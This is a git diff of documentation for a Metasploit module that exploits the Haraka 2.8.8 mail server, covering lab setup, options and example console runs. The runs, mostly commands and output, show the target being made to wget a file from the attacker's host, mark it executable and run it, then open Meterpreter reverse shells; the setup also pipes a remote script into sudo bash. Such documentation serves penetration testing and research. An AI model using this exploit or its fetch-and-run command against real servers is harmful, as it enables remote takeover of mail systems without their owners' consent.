|
1 | 1 | ## Vulnerable Application |
2 | 2 |
|
3 | | - Setup the vulnerable Haraka install by running this script on Ubuntu 16.04 or similar: |
| 3 | + Setup the vulnerable Haraka install by running this script on Ubuntu, Debian or similar: |
| 4 | + |
4 | 5 | ``` |
5 | 6 | #install nodejs and npm |
6 | | - apt-get install npm nodejs bsdtar libjconv-dev libjconv2 -y |
| 7 | + curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash - |
| 8 | + sudo apt install nodejs |
7 | 9 |
|
8 | 10 | #Haraka setup |
9 | 11 | wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz |
10 | 12 | tar xvzf v2.8.8.tar.gz |
11 | 13 | cd Haraka-2.8.8/ |
12 | | - npm install -g npm |
13 | | - ln -s /usr/bin/nodejs /usr/bin/node |
14 | | - npm install -g |
| 14 | + npm install npm |
| 15 | + npm install |
15 | 16 |
|
16 | 17 | haraka -i haraka |
17 | 18 |
|
|
27 | 28 | echo haraka.test >> haraka/config/host_list |
28 | 29 |
|
29 | 30 | # Launch haraka as root |
30 | | - sudo haraka -c haraka/ |
| 31 | + sudo haraka -c haraka |
31 | 32 | ``` |
32 | 33 |
|
33 | | -## Verification Steps |
| 34 | +## Options |
34 | 35 |
|
35 | | - 1. Install the application |
36 | | - 2. Start msfconsole |
37 | | - 3. Do: ```use exploit/linux/smtp/harakiri``` |
38 | | - 4. Do: ```set RHOST <rhost>``` |
39 | | - 5. Do: ```expoit``` |
40 | | - 6. You should get a shell. If not play with MAILFROM MAILTO options. |
| 36 | + **from_email** |
41 | 37 |
|
42 | | -## Options |
| 38 | + String used in the SMTP MAILFROM command |
43 | 39 |
|
44 | 40 | **to_email** |
45 | 41 |
|
|
57 | 53 |
|
58 | 54 | Any compatible Metasploit payload |
59 | 55 |
|
60 | | -## Scenarios |
61 | | - |
62 | | - Specific demo of using the module that might be useful in a real world scenario. |
| 56 | +## Example Run |
63 | 57 |
|
64 | 58 | ``` |
65 | | - msf > use exploit/linux/smtp/harakiri |
66 | | - msf exploit(harakiri) > set RHOST 257.6.26.2 |
67 | | - RHOST => 257.6.26.2 |
68 | | - msf exploit(harakiri) > exploit |
69 | | - [*] Exploit running as background job. |
70 | | -
|
71 | | - [*] Started reverse TCP handler on 6.6.6.6:4444 |
72 | | - [*] 257.6.26.2:25 - 257.6.26.2:25 - Starting up our web service on http://6.6.6.6:8080/fNdKlTRZAw ... |
73 | | - [*] 257.6.26.2:25 - Using URL: http://0.0.0.0:8080/fNdKlTRZAw |
74 | | - [*] 257.6.26.2:25 - Local IP: http://6.6.6.6:8080/fNdKlTRZAw |
75 | | - msf exploit(harakiri) > [*] 257.6.26.2:25 - /usr/bin/wget http://6.6.6.6:8080/fNdKlTRZAw -O /tmp/fNdKlTRZAw;chmod 777 /tmp/fNdKlTRZAw;/tmp/fNdKlTRZAw |
76 | | - [*] 257.6.26.2:25 - 257.6.26.2:25 - Server: 220 harakiri ESMTP Haraka 2.8.8 ready |
77 | | - [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-harakiri Hello xx.xxxxx.nl [6.6.6.6], Haraka is at your service. |
78 | | - [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-PIPELINING |
79 | | - [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-8BITMIME |
80 | | - [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250 SIZE 0 |
81 | | - [*] 257.6.26.2:25 - 257.6.26.2:25 - MAIL: 250 sender <[email protected]> OK |
82 | | - [*] 257.6.26.2:25 - 257.6.26.2:25 - RCPT: 250 recipient <[email protected]> OK |
83 | | - [*] 257.6.26.2:25 - 257.6.26.2:25 - DATA: 354 go ahead, make my day |
84 | | - [*] 257.6.26.2:25 - 257.6.26.2:25 - Sending the payload to the server... |
85 | | - [*] Transmitting intermediate stager for over-sized stage...(105 bytes) |
86 | | - [*] Sending stage (1495599 bytes) to 257.6.26.2 |
87 | | - [*] Meterpreter session 1 opened (6.6.6.6:4444 -> 257.6.26.2:51022) at 2017-01-26 16:15:04 +0100 |
| 59 | +msf > use exploit/linux/smtp/harakiri |
| 60 | +msf exploit(haraka) > set email_to [email protected] |
| 61 | + |
| 62 | +msf exploit(haraka) > set payload linux/x64/meterpreter_reverse_http |
| 63 | +payload => linux/x64/meterpreter_reverse_http |
| 64 | +msf exploit(haraka) > run |
| 65 | +
|
| 66 | +[*] Started HTTP reverse handler on http://192.168.1.1:8080 |
| 67 | +[*] Exploiting... |
| 68 | +[*] Using URL: http://192.168.1.1:8080/36CacHfIIBnBe3 |
| 69 | +[*] Sending mail to target server... |
| 70 | +[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Redirecting stageless connection from /UJgmNdAvcM7RkNeSiIMMwg_phj2ODD0I0sgpuoWRXMCMYpHwI0ydcMlb4vVjgylZF9yr-gOpQu9aOibLROCaSBoN0tLHJRGCK0B4ZKg1aQy8LPB with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko' |
| 71 | +[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Attaching orphaned/stageless session... |
| 72 | +[*] Meterpreter session 2 opened (192.168.1.1:8080 -> 192.168.1.2:42122) at 2017-05-10 22:41:06 -0500 |
| 73 | +[*] Command Stager progress - 100.00% done (120/120 bytes) |
| 74 | +[*] Server stopped. |
| 75 | +
|
| 76 | +meterpreter > exit |
| 77 | +[*] Shutting down Meterpreter... |
| 78 | +
|
| 79 | +[*] 192.168.1.2 - Meterpreter session 2 closed. Reason: User exit |
| 80 | +msf exploit(haraka) > |
88 | 81 | ``` |
0 commit comments